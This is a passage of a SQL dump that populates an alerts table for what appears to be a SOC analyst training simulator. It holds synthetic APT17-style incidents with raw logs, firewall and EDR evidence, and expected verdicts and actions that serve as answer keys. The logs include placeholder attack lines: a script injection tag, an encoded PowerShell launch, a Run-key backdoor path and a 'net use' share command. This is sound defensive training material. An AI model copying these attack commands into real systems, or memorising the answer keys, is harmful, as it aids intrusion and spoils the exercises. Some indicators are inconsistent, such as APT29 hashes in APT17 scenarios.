compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.528Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T13:45:32Z\\\",\\\"event_id\\\":\\\"4720\\\",\\\"host_ip\\\":\\\"192.168.1.45\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\Backdoor\\\",\\\"file_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\backdoor.exe\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"attacker_ip\\\":\\\"203.0.113.15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1208, 'Lateral Movement Detected', 'high', 'User Activity Monitoring', 'Using stolen credentials and insider tools, the attackers begin moving laterally, probing for valuable data and additional systems to compromise.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"target_machine\":\"192.168.1.45\",\"action\":\"Successful Logon\",\"logon_type\":\"Network\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"insider_tools.exe\",\"internal_ip\":\"10.0.0.12\"}', '2026-02-07 21:24:22', '2026-02-19 15:56:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account, potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"insider_tools.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"File used for lateral movement within network.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event 
count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.529Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"target_machine\\\":\\\"192.168.1.45\\\",\\\"action\\\":\\\"Successful Logon\\\",\\\"logon_type\\\":\\\"Network\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"insider_tools.exe\\\",\\\"internal_ip\\\":\\\"10.0.0.12\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1209, 'Data Exfiltration Attempt Blocked', 'high', 'Data Loss Prevention (DLP) System', 'With a foothold established, APT17 attempts to exfiltrate sensitive data to their command and control servers, but vigilant monitoring raises an alert, providing an opportunity to thwart the data theft.', 'Exfiltration', 'T1041', 1, 'resolved', NULL, '{\"timestamp\":\"2023-11-05T14:23:07Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"user\":\"jdoe\",\"file_name\":\"confidential_project_data.zip\",\"file_hash\":\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\",\"action\":\"blocked\",\"alert_id\":\"dlp-20231105-0001\"}', '2026-02-07 21:24:22', '2026-02-20 02:08:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Associated with APT17 C&C servers\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_project_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive project data\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Hash of sensitive file attempted for exfiltration\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Valid user account involved in activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-08T19:00:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:59:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:58:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:57:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"},{\"timestamp\":\"2026-02-08T18:56:02.530Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-11-05T14:23:07Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"jdoe\\\",\\\"file_name\\\":\\\"confidential_project_data.zip\\\",\\\"file_hash\\\":\\\"3f8a1b2c4d5e6f7890a1b2c3d4e5f678\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"dlp-20231105-0001\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1210, 'Suspicious Network Traffic Detected', 'high', 'Network Monitoring System', 'APT17 initiated a network scan for web vulnerabilities targeting policy think tanks. The scan resulted in abnormal traffic patterns, triggering this alert.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:21Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"destination_port\":80,\"protocol\":\"HTTP\",\"request_method\":\"GET\",\"url\":\"/vulnerabilities/scan\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"status_code\":200,\"response_size\":512,\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"vuln_scan_script.py\"}', '2026-02-07 21:25:01', '2026-02-19 15:55:48', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT17 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal web server hosting policy think tank resources.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Associated with APT17 scanning activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"vuln_scan_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Script used for probing vulnerabilities in web applications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1211, 'JavaScript Injection Detected', 'high', 'Web Application Firewall', 'A sophisticated JavaScript payload was injected into the targeted web pages through a Web Application Firewall. This attack aims to execute malicious JavaScript on visitor browsers, marking the execution phase of a complex attack.', 'Execution', 'T1059.007', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"http_method\":\"POST\",\"uri\":\"/index.html\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\",\"injected_script\":\"<script>evilFunction();</script>\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_payload.js\",\"username\":\"compromised_user\"}', '2026-02-07 21:25:01', '2026-02-19 15:54:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with JavaScript injection attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal web server targeted by the attack.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious JavaScript payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in injection 
attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1212, 'Malicious Code Persistence Established', 'high', 'Endpoint Detection and Response', 'APT17 has established persistence on the compromised system by embedding scripts that reload upon system restart. This ensures their uninterrupted access.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T02:14:37Z\",\"host\":\"DESKTOP-9F5G8H2\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"malicious_file\":\"C:\\\\Windows\\\\System32\\\\scriptloader.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_id\":7045,\"event_type\":\"Service Installed\",\"service_name\":\"ScriptLoader\",\"service_filepath\":\"C:\\\\Windows\\\\System32\\\\scriptloader.exe\",\"related_process\":\"svchost.exe\"}', '2026-02-07 21:25:01', '2026-02-19 15:53:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Threat Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT17 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash found in multiple malware databases associated with persistence techniques.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account involved in the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1213, 'Lateral Movement Detected Across Network', 'high', 'Internal Network Logs', 'An advanced attacker has been detected moving laterally across the network using legitimate credentials. The attacker is targeting sensitive data within the think tank\'s infrastructure.', 'Lateral Movement', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:16Z\",\"event_id\":\"4769\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"10.0.0.45\",\"user\":\"compromised_user\",\"action\":\"LogonSuccess\",\"auth_type\":\"Kerberos\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"command_line\":\"cmd.exe /c net use \\\\\\\\10.0.0.45\\\\sensitive_share\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_name\":\"APT29_Tool\",\"external_ip\":\"203.0.113.45\"}', '2026-02-07 21:25:01', '2026-02-19 15:56:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal logs\",\"verdict\":\"suspicious\",\"details\":\"User credentials likely compromised.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29 
tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1214, 'Data Exfiltration Attempted', 'critical', 'Data Loss Prevention System', 'During the final stage of the attack, APT17 attempted to exfiltrate sensitive data to an external server. This action was detected and blocked by the Data Loss Prevention System. The attack leveraged a compromised internal host to send data to a known malicious IP address.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:35:22Z\",\"event_id\":\"DLP-Exfil-20231015-001\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"192.0.2.45\",\"protocol\":\"HTTPS\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"3e23e8160039594a33894f6564e1b134\",\"username\":\"jdoe\",\"process_name\":\"data_exfil.exe\",\"malicious_ip\":true,\"tags\":[\"APT17\",\"Exfiltration\",\"Critical\"]}', '2026-02-07 21:25:01', '2026-02-14 17:02:16', 